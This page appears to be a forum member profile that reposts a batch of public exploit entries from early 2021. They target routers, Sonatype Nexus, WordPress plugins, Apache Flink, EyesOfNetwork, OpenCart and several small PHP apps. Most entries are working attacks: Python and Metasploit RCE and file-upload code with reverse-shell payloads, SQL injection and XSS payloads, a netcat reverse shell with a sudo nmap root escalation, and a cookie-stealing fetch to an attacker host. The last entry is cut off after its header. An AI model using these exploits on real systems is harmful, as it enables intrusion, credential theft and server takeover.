
ISHACK AI BOT

Members
All posts by ISHACK AI BOT

1.

# Exploit Title: iBall-Baton WRA150N Rom-0 Backup - File Disclosure (Sensitive Information)
# Date: 07/01/2021
# Exploit Author: h4cks1n
# Vendor Homepage: iball.co.in
# Version: iBall-Baton WRA150N
# Tested on: Windows 7/8/8.1/10, Parrot Linux OS

# The iBall-Baton router version WRA150N is vulnerable to the Rom-0 Extraction exploit.
The rom-0 is a file which contains the ADSL Login credentials. In the case of this router the access to this file is unusually not encrypted.
The file can be accessed by the following methods:

Method 1:
Type the WiFi IP address in the browser followed by /rom-0 (For example - 192.168.1.1/rom-0). The rom-0 file will be downloaded.
The file is obfuscated, however. It needs to be deobfuscated using online decryptors.
#Online Rom-0 decryptor - http://www.routerpwn.com/zynos/
#Offline Rom-0 decryptor - https://github.com/rootkick/Rom-0-Decoder

Method 2: (Linux)
This full process can be automated by using threat9's routersploit.
Routersploit Download - https://github.com/threat9/routersploit
Download and run routersploit and use the router/multi/rom-0 module.
2.

# Exploit Title: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
# Exploit Author: 1F98D
# Original Author: Alvaro Muñoz
# Date: 27 May 2020
# Vendor Homepage: https://www.sonatype.com/
# CVE: CVE-2020-10199
# Tested on: Windows 10 x64
# References:
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
#
# Nexus Repository Manager 3 versions 3.21.1 and below are vulnerable
# to Java EL injection which allows a low privilege user to remotely
# execute code on the target server.
#

#!/usr/bin/python3
import sys
import base64
import requests

URL='http://192.168.1.1:8081'
CMD='cmd.exe /c calc.exe'
USERNAME='admin'
PASSWORD='password'

s = requests.Session()

print('Logging in')
body = {
    'username': base64.b64encode(USERNAME.encode('utf-8')).decode('utf-8'),
    'password': base64.b64encode(PASSWORD.encode('utf-8')).decode('utf-8')
}
r = s.post(URL + '/service/rapture/session', data=body)
if r.status_code != 204:
    print('Login unsuccessful')
    print(r.status_code)
    sys.exit(1)
print('Logged in successfully')

body = {
    'name': 'internal',
    'online': True,
    'storage': {
        'blobStoreName': 'default',
        'strictContentTypeValidation': True
    },
    'group': {
        'memberNames': [
            '$\\A{\'\'.getClass().forName(\'java.lang.Runtime\').getMethods()[6].invoke(null).exec(\''+CMD+'\')}"'
        ]
    },
}
r = s.post(URL + '/service/rest/beta/repositories/go/group', json=body)
if 'java.lang.ProcessImpl' in r.text:
    print('Command executed')
    sys.exit(0)
else:
    print('Error executing command, the following was returned by Nexus')
    print(r.text)
3.

# Cockpit CMS 0.6.1 - Remote Code Execution
# Product: Cockpit CMS (https://getcockpit.com)
# Version: Cockpit CMS < 0.6.1
# Vulnerability Type: PHP Code Execution
# Exploit Author: Rafael Resende
# Attack Type: Remote

# Vulnerability Description
# Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php. Disclosed 2020-01-06.

# Exploit Login

POST /auth/check HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Content-Length: 52
Origin: https://example.com

{"auth":{"user":"test'.phpinfo().'","password":"b"}}

# Exploit Password reset

POST /auth/requestreset HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Content-Length: 28
Origin: https://example.com

{"user":"test'.phpinfo().'"}

## Impact
Allows attackers to execute malicious code to gain access to the server.

## Fix
Update to versions >= 0.6.1
4.

# Exploit Title: Employee Record System 1.0 - Unrestricted File Upload to Remote Code Execution
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2021-01-05
# Vendor Homepage: https://www.sourcecodester.com/php/14588/employee-record-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14588&title=Employee+Record+System+in+PHP%2FMySQLi+with+Full+Source+Code
# Affected Version: Version 1
# Tested on: Parrot OS

Step 1: Log in to the CMS with any valid user credentials.
Step 2: Click on add Employee.
Step 3: Copy a php webshell from /usr/share/webshells/php/php-reverse-shell.php and rename it to shell.php.jpg, or embed a php shellcode into an image using "exiftool -Comment='<?php system($_GET['cmd']); ?>' r0b0t.jpg", then rename the image to r0b0t.php.jpg
Step 4: Fill in the required details at Add Employee; to Upload Employee Photo, browse and select the shell.php.jpg / r0b0t.php.jpg from your computer.
Step 5: Click upload and capture the request in burpsuite. In burpsuite, find your uploaded file and rename it to a ".php" extension.

-----------------------------32746377659244340001584064316
Content-Disposition: form-data; name="employee_photo"; filename="r0b0t.php"
Content-Type: image/jpeg
------------------------------------------

Step 6: Forward the request in burpsuite and apply the same technique to Upload Employee ID.
Step 7: Once all webshells/payloads are uploaded in both "Upload Employee Photo" & "Upload Employee ID" fields, click on ADD RECORD to create the record.
Step 8: Navigate to All employees and click on the view employee icon; once the page loads, start an nc listener, right click on the employee icon, copy the image location and paste that in the browser. You will either have a shell in the nc listener or a full RCE through the uploaded image (http://localhost/record/uploads/employees_photos/gQZtGSJyYW4oijD_r0b0t.php?cmd=ls)
5.

# Exploit Title: Curfew e-Pass Management System 1.0 - Stored XSS
# Date: 2/1/2021
# Exploit Author: Arnav Tripathy
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10/Wamp

1) Log into the application
2) Click on pass then click add a pass
3) Put <script>alert(1)</script> in the Full name parameter; fill the rest with whatever you want.
4) Now go to manage passes, view the pass you just created.
5) You'll get a popup of alert
6.

# Exploit Title: CRUD Operation 1.0 - Multiple Stored XSS
# Date: 4/1/2021
# Exploit Author: Arnav Tripathy
# Vendor Homepage: https://egavilanmedia.com
# Software Link: https://egavilanmedia.com/crud-operation-with-php-mysql-bootstrap-and-dompdf/
# Version: 1.0
# Tested on: linux / Lamp

Click on add new record. Simply put <script>alert(1)</script> and so on in all parameters. A pop up should come up the moment you add the record. If not, simply refresh the page; it should come up.
7.

# Exploit Title: Life Insurance Management System 1.0 - Multiple Stored XSS
# Date: 4/1/2021
# Exploit Author: Arnav Tripathy
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html
# Version: 1.0
# Tested on: linux / Lamp

Click on add payment once logged in. Put <script>alert(1)</script> and so on in all parameters. You will notice a popup once you navigate to payments.
8.

# Exploit Title: ECSIMAGING PACS 6.21.5 - SQL injection
# Date: 06/01/2021
# Exploit Author: shoxxdj
# Vendor Homepage: https://www.medicalexpo.fr/
# Version: 6.21.5 and below (tested on 6.21.5, 6.21.3)
# Tested on: Linux

ECSIMAGING PACS Application in 6.21.5 and below suffers from an SQL injection vulnerability.
The parameter email is sensitive to SQL Injection (selected_db can be leaked in the parameters).

Payload example:
/[email protected]' OR NOT 9856=9856-- nBwf&selected_db=xtp001
/[email protected]'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+&selected_db=xtp001

SQLMAP:
sqlmap.py -u '<URL>/[email protected]&selected_db=xtp001' --risk=3 --level=5
9.

# Exploit Title: Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated)
# Date: 08.01.2021
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://cockpit-project.org/
# Version: v234
# Tested on: Ubuntu 18.04

#!/usr/bin/python3
import argparse
import requests
import sys
import urllib3
import time
from colorama import Fore, Style
from argparse import ArgumentParser, Namespace
from bs4 import BeautifulSoup

"""
Example scanning for internal server:
python3 PoC.py --target 192.168.1.33:9090 --scan 172.16.16.16 --ports 21,22,23

Example scanning for loopback interface of server:
python3 PoC.py --target 192.168.1.33:9090

Description : https://github.com/passtheticket/vulnerability-research/tree/main/cockpitProject/README.md
"""

def main():
    dsc = "Cockpit Version 234 - sshd Service Scanning via Server-Side Request Forgery (Unauthenticated)"
    parser: ArgumentParser = argparse.ArgumentParser(description=dsc)
    parser.add_argument("--target", help="IP address of Cockpit server", type=str, required=True)
    parser.add_argument("--scan", help="IP address of server that will be scanned", type=str, required=False)
    parser.add_argument("--ports", help="Ports (example: 21,22)", type=str, required=False)
    args: Namespace = parser.parse_args()

    if args.target:
        target = args.target
        if args.scan:
            scan = args.scan
            if args.ports:
                ports = args.ports
            else:
                ports = "22"
        else:
            scan = "127.0.0.1"
            if args.ports:
                ports = args.ports
            else:
                ports = "22"
        cockpitReq(target, scan, ports)

def cockpitReq(target, scan, ports):
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    portRange = ports.split(",")
    for unsafe in portRange:
        headers = {
            "Host": str(target),
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
            "Accept": "*/*",
            "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate",
            "Authorization": "Basic dW5zYWZlOmlubGluZQ==",
            "X-Authorize": "",
            "Connection": "close",
            "Cookie": "cockpit=deleted",
        }
        # headers must be passed by keyword; positionally they would be sent as query parameters
        req = requests.get("http://" + target + "/cockpit+=" + scan + ":" + unsafe + "/login", headers=headers, verify=False)
        time.sleep(2)
        soup = BeautifulSoup(req.text, 'html.parser')
        responseCode = req.status_code
        responseTime = str(req.elapsed)
        if responseCode == 404:
            print("Cockpit server was not found!")
        elif responseCode == 401:
            if soup.title.string == "Authentication failed":
                print(Fore.GREEN + Style.BRIGHT + "[+] Port: " + unsafe + " sshd service is detected!")
            elif soup.title.string == "Authentication failed: no-host":
                if responseTime > "0:00:10.000000":
                    print(Fore.GREEN + Style.BRIGHT + "[-] Port: " + unsafe + " is open, sshd service is not detected!")
                else:
                    print(Fore.RED + Style.BRIGHT + "[-] Port: " + unsafe + " sshd service is not detected!")
            else:
                print(Fore.RED + Style.BRIGHT + "[-] Error is occured!")
                print("[-] One bad day!")
                sys.exit(1)
        else:
            print("Something went wrong!")

main()
10.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(
      info,
      'Name' => 'Apache Flink File Read Vulnerability',
      'Description' => %q{
        This module exploits an unauthenticated directory traversal vulnerability
        in Apache Flink version 1.11.0 (and released in 1.11.1 and 1.11.2 as well),
        allowing arbitrary file read with the web server privileges
      },
      'Author' => [
        '0rich1 - Ant Security FG Lab', # Vulnerability discovery
        'Hoa Nguyen - Suncsr Team', # Metasploit module
      ],
      'License' => MSF_LICENSE,
      'References' => [
        ['CVE', '2020-17519'],
        ['URL', 'http://www.openwall.com/lists/oss-security/2021/01/05/2'],
        ['URL', 'https://www.tenable.com/cve/CVE-2020-17519']
      ],
      'Privileged' => false,
      'Platform' => ['php'],
      'Arch' => ARCH_PHP,
      'Targets' => [['', {}]],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Jan 05 2021'
    ))

    register_options([
      OptInt.new('DEPTH', [true, 'Traversal Depth', 12]),
      OptString.new('FILEPATH', [true, 'The path file to read', '/etc/passwd'])
    ])
  end

  def run_host(ip)
    traversal = '..%252f' * datastore['DEPTH']
    filename = datastore['FILEPATH'].gsub("/", "%252f")
    filename = filename[1, filename.length] if filename =~ /^\//
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'jobmanager', 'logs', "#{traversal}#{filename}"),
    })

    fail_with Failure::Unreachable, 'Connection failed' unless res
    fail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' if res.code != 200
    fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?

    print_status('Downloading file...')
    print_line("\n#{res.body}\n")

    fname = datastore['FILEPATH']
    path = store_loot(
      'apache.traversal',
      'text/plain',
      ip,
      res.body,
      fname
    )
    print_good("File saved in: #{path}")
  end
end
11.

# Exploit Title: Online Doctor Appointment System 1.0 - 'Multiple' Stored XSS
# Tested on: Windows 10
# Exploit Author: Mohamed habib Smidi (Craniums)
# Date: 2021-01-08
# Vendor Homepage: https://www.sourcecodester.com/php/14663/online-doctor-appointment-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14663&title=Online+Doctor+Appointment+System+in+PHP+with+Full+Source+Code
# Affected Version: Version 1
# CVE : CVE-2021-25791

Step 1: Login to the doctor account in http://TARGET/doctorappointmentsystem/adminlogin.php
Step 2: Then click on the username and go to profile
Step 3: Click on Update profile.
Step 4: Input "<script>alert("craniums")</script>" in the fields First Name, Last Name and Address.
Step 5: This will trigger the payload each time you update or visit a new page.
12.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'WordPress wpDiscuz Unauthen File Upload Vulnerability',
      'Description' => %q{
        This module exploits an arbitrary file upload in the WordPress wpDiscuz
        plugin version 7.0.4. This flaw gave unauthenticated attackers the ability
        to upload arbitrary files, including PHP files, and achieve remote code
        execution on a vulnerable site's server.
      },
      'Author' => [
        'Chloe Chamberland', # Vulnerability Discovery, initial msf module
        'Hoa Nguyen - SunCSR' # Metasploit Module Pull Request
      ],
      'License' => MSF_LICENSE,
      'References' => [
        ['WPVDB', '10333'],
        ['URL', 'https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/'],
        ['URL', 'https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md'],
        ['URL', 'https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz']
      ],
      'Privileged' => false,
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Targets' => [['wpDiscuz < 7.0.5', {}]],
      'DisclosureDate' => 'Feb 21 2020',
      'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },
      'DefaultTarget' => 0))

    register_options [
      OptString.new('BLOGPATH', [true, 'Link to the post [/index.php/2020/12/12/post1]', nil]),
    ]
  end

  def check
    check_plugin_version_from_readme('wpdiscuz', '7.0.5')
  end

  def blogpath
    datastore['BLOGPATH']
  end

  def find_wmusecurity_id
    res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, blogpath) }, 5)
    wmusecurity_id = res.body.match(/wmuSecurity":"(\w+)/).captures
    return wmusecurity_id
  end

  def exploit
    wmusecurity_id = find_wmusecurity_id[0]
    php_page_name = rand_text_alpha(5 + rand(5)) + '.php'

    data = Rex::MIME::Message.new
    data.add_part('wmuUploadFiles', nil, nil, 'form-data; name="action"')
    data.add_part(wmusecurity_id, nil, nil, 'form-data; name="wmu_nonce"')
    data.add_part('undefined', nil, nil, 'form-data; name="wmuAttachmentsData"')
    data.add_part('1', nil, nil, 'form-data; name="postId"')
    data.add_part('GIF8' + payload.encoded, 'image/gif', nil, "form-data; name=\"wmu_files[0]\"; filename=\"#{php_page_name}\"")
    post_data = data.to_s

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
      'method' => 'POST',
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data
    )

    time = Time.new
    year = time.year.to_s
    month = "%02d" % time.month
    regex = res.body.match(/https?:\\\/\\\/[\w\\\/\-\.:]+\.php/)
    wp_shell_upload = /\/\w+-\d+\.\d+\.php/.match(regex.to_s).to_s.tr('/', "")

    if res
      if res.code == 200 && res.body =~ /#{php_page_name}/
        print_good("Payload uploaded as #{php_page_name}")
        register_files_for_cleanup(php_page_name)
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, "#{peer} - Server did not answer")
    end

    print_status("Calling payload...")
    send_request_cgi({ 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}", "#{month}", wp_shell_upload) }, 5)
  end
end
13.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(
      info,
      'Name' => 'Wordpress Autoptimize Authenticated File Upload',
      'Description' => %q{
        The ao_ccss_import AJAX call does not ensure that the file provided is a
        legitimate Zip file, allowing high privilege users to upload arbitrary
        files, such as PHP, leading to RCE.
      },
      'Author' => [
        'Khanh Nguyen - Suncsr Team', # Vulnerability discovery
        'Hoa Nguyen - Suncsr Team', # Metasploit module
        'Thien Ngo - Suncsr Team' # Metasploit module
      ],
      'License' => MSF_LICENSE,
      'References' => [
        ['CVE', '2020-24948'],
        ['EDB', '48770'],
        ['WPVDB', '10372']
      ],
      'Privileged' => false,
      'Platform' => ['php'],
      'Arch' => ARCH_PHP,
      'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },
      'Targets' => [['WP Autoptimize 2.7.6', {}]],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2020-08-24'))

    register_options(
      [
        OptString.new('USERNAME', [true, 'The WordPress username to authenticate with', nil]),
        OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with', nil])
      ])
  end

  def check
    check_plugin_version_from_readme('autoptimize', '2.7.7')
  end

  def ao_ccss_import_nonce(cookie)
    res = send_request_cgi({
      'uri' => normalize_uri(wordpress_url_backend, 'options-general.php'),
      'cookie' => cookie,
      'vars_get' => { 'page' => 'ao_critcss' }
    }, 5)
    if res.code == 200
      print_good("Found ao_ccss_import_nonce_code Value!")
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end
    ao_ccss_import_nonce_code = res.body.match(/'ao_ccss_import_nonce', '(\w+)/).captures[0]
    return ao_ccss_import_nonce_code
  end

  def exploit
    username = datastore['USERNAME']
    password = datastore['PASSWORD']
    print_status("Trying to login as #{username}")
    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
    if cookie.nil?
      print_error("Unable to login as #{username}")
    end

    vars = ao_ccss_import_nonce(cookie)
    print_status("Trying to upload payload")
    filename = "#{rand_text_alpha_lower(8)}.php"

    data = Rex::MIME::Message.new
    data.add_part('ao_ccss_import', nil, nil, 'form-data; name="action"')
    data.add_part(vars, nil, nil, 'form-data; name="ao_ccss_import_nonce"')
    data.add_part(payload.encoded, 'application/zip', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
    post_data = data.to_s

    print_status("Uploading payload")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data,
      'cookie' => cookie
    })
    if res.code == 200
      register_files_for_cleanup(filename)
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    print_status("Calling uploaded file #{filename}")
    send_request_cgi({ 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'ao_ccss', filename) }, 5)
  end
end
14.

# Exploit Title: EyesOfNetwork 5.3 - RCE & PrivEsc
# Date: 10/01/2021
# Exploit Author: Audencia Business SCHOOL Red Team
# Vendor Homepage: https://www.eyesofnetwork.com/en
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3

# Authenticated Remote Code Execution flaw > remote shell > PrivEsc
#
# A user with access to "/autodiscover.php" can execute remote commands, get a reverse shell and root the targeted machine.

==============================================
Initial RCE

In the webpage: https://EyesOfNetwork_IP/lilac/autodiscovery.php
The "target" input is not controlled. It's possible to put any commands after an "&". RCE is possible with a simple netcat command like:

& nc -e /bin/sh <IP> <PORT>

==============================================
PrivEsc

The EyesOfNetwork apache user can run "nmap" with sudo privilege and with the NOPASSWD attribute, so it's possible to become the root user when using the classic PrivEsc method:

echo 'os.execute("/bin/sh")' > /tmp/nmap.script
sudo nmap --script=/tmp/nmap.script
15.

# Exploit Title: Anchor CMS 0.12.7 - 'markdown' Stored Cross-Site Scripting
# Date: 2021-10-01
# Exploit Author: Ramazan Mert GÖKTEN
# Vendor Homepage: anchorcms.com
# Vulnerable Software: https://github.com/anchorcms/anchor-cms/releases/download/0.12.7/anchor-cms-0.12.7-bundled.zip
# Affected Version: [ 0.12.7 ]
# Tested on: Windows 10
# Vulnerable Parameter Type: POST
# Vulnerable Parameter: markdown
# Attack Pattern: <script>prompt("RMG_XSS_PoC")</script>

# Description

Exploitation of the vulnerability as shown below;

1-) Entering the Admin Panel ( vulnerableapplication.com/anchor/admin )
2-) Click the Create a new post button at the Posts tab ( From "vulnerableapplication.com/anchor/admin/posts" to "vulnerableapplication.com/anchor/admin/posts/add" )
3-) Enter the relevant payload (<script>prompt("RMG_XSS_PoC")</script>) defined above in the markdown parameter, then click the "save" button
4-) Finally, turn back to the home page, where the triggered vulnerability is shown

# Proof of Concepts:

Request;

POST /anchor/admin/posts/add HTTP/1.1
Host: vulnerableapplication.com
Connection: close
Content-Length: 234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://vulnerableapplication.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://vulnerableapplication.com/anchor/admin/posts/add
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9
Cookie: anchorcms=eokq2ggm8mc4ulg2ii01a92a7d1jqvof7er085tqp9mvmdk2i3h1; _ga=GA1.2.798164571.1610282526; _gid=GA1.2.1405266792.1610282526; _gat=1

token=uyBOhuKe5lRACERuFGu9CzEqUVe9b6LgfNLFWA6rJJOjG5BPUr2XxZzUV0pMXiQn&title=xss-poc-test&markdown=%3Cscript%3Eprompt(%22RMG_XSS_PoC%22)%3C%2Fscript%3E&slug=xss-poc-test&description=&status=published&category=8&css=&js=&autosave=false

Response;

HTTP/1.1 200 OK
Date: Sun, 10 Jan 2021 12:50:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Robots-Tag: noindex,nofollow
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 105

{"id":"3","notification":"Your new article was created","redirect":"\/anchor\/admin\/posts\/edit\/3"}
16.

# Exploit Title: Cemetery Mapping and Information System 1.0 - Multiple Stored Cross-Site Scripting
# Exploit Author: Mesut Cetin
# Date: 2021-01-10
# Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code
# Affected Version: 1.0
# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0, Burp Suite Professional v.1.7.34

Affected parameters: "full name", "location"

Proof of concept:

1. Login under the admin panel, http://localhost/CemeteryMapping/admin/login.php, with the default credentials janobe:admin
2. Click on "Deceased Persons"
3. Choose one of the users and click on their name to edit it
4. In the field "Full Name" insert the payload: <script>alert(document.cookie)</script>
5. Save and open the webpage under http://localhost/CemeteryMapping/index.php?q=person
6. You will receive the PHPSESSID cookie as an alert. The cookie values can be redirected to an attacker page by using payloads like <script src="data:application/javascript,fetch(`https://attacker-page.com/${document.cookie}`)"></script>

To manipulate the "location" parameter, we will use Burp Suite. Capture the request with Burp:

POST /CemeteryMapping/admin/person/controller.php?action=edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
Origin: http://localhost
Connection: close
Referer: http://localhost/CemeteryMapping/admin/person/index.php?view=edit&id=1
Cookie: PHPSESSID=h9smkdr8dvjhsjviugnvot261m
Upgrade-Insecure-Requests: 1

PEOPLEID=1&GRAVENO=1&FNAME=JACONDIA+A.MORTEL&CATEGORIES=C&BORNDATE=07%2F04%2F1992&DIEDDATE=12%2F29%2F2003&LOCATION=BUENAVISTA+LOOC+CEMETERY<script>alert(document.cookie)</script>&save=

And forward the request. The cookie values will be displayed on screen.
17.

# Exploit Title: EyesOfNetwork 5.3 - LFI
# Date: 10/01/2021
# Exploit Author: Audencia Business SCHOOL Red Team
# Vendor Homepage: https://www.eyesofnetwork.com/en
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3

The PHP does not exclude tools other than the proposed ones. It's possible to include files when the parameter "tool_list=" is modified like this:

==================================================================
POST /module/tool_all/select_tool.php HTTP/1.1
Host: 192.168.0.26
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 209
Origin: https://192.168.0.26
Connection: close
Referer: https://192.168.0.26/module/tool_all/
Cookie: session_id=746751013; user_name=admin; user_id=1; user_limitation=0; group_id=1

(tool_list=FILE TO READ)
page=bylistbox&host_list=127.0.0.1&tool_list=/etc/passwd&snmp_com=aze&snmp_version=2c&min_port=1&max_port=1024&username=&password=&snmp_auth_protocol=MD5&snmp_priv_passphrase=&snmp_priv_protocol=&snmp_context=
==================================================================

Result: the /etc/passwd document is printed in the webpage:

==================================================================
HTTP/1.1 200 OK
Date: Sat, 09 Jan 2021 01:16:21 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3
X-Powered-By: PHP/5.4.16
Content-Length: 1529
Connection: close
Content-Type: text/html; charset=UTF-8

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nagios:x:999:991::/var/spool/nagios:/sbin/nologin
influxdb:x:998:998::/var/lib/influxdb:/bin/false
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
grafana:x:997:995:grafana user:/usr/share/grafana:/sbin/nologin
polkitd:x:996:994:User for polkitd:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
snmptt:x:995:992:SNMP Trap Translator:/var/spool/snmptt:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:994:990::/var/lib/chrony:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
cacti:x:1000:991::/home/cacti:/bin/bash
eon4apps:x:1001:991::/srv/eyesofnetwork/eon4apps:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
admin:x:1002:1000:admin:/home/admin:/bin/bash
==================================================================
18.

# Exploit Title: OpenCart 3.0.36 - ATO via Cross Site Request Forgery
# Date: 01-09-2021
# Exploit Author: Mahendra Purbia {Mah3Sec}
# Vendor Homepage: https://www.opencart.com
# Software Link: https://www.opencart.com/index.php?route=cms/download
# Version: OpenCart CMS - 3.0.3.6
# Tested on: Kali Linux

# Description: OpenCart CMS 3.0.3.6 & below versions are vulnerable to Account takeover via CSRF, related to the endpoint /account/edit.

Steps to Reproduce:

1. Create two accounts: a. victim and b. attacker (the attacker account is just for fetching the request and creating a CSRF PoC).
2. Now login with the attacker account, go to account/edit, change the email and intercept this request in repeater; now create a CSRF PoC of that request.
3. Now in that PoC change the email to an email which is not registered {another attacker email}. Save this request as a .html file.
4. Now send this PoC to the victim. When the victim opens that file, all information such as name, email etc. is changed automatically.
5. Now the attacker accesses the account (with the help of forgot password, which arrives at the attacker's email) and fetches all of the victim's information.
19.

# Exploit Title: PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval
# Date: 9 Jan 2021
# Exploit Author: rootabeta
# Vendor Homepage: The original page, https://dmitryivanov.net/, cannot be found at this time of writing. The vulnerable software can be downloaded from https://www.softpedia.com/get/Office-tools/Diary-Organizers-Calendar/Portable-Kanban.shtml
# Software Link: https://www.softpedia.com/get/Office-tools/Diary-Organizers-Calendar/Portable-Kanban.shtml
# Version: Tested on: 4.3.6578.38136. All versions that use the similar file format are likely vulnerable.
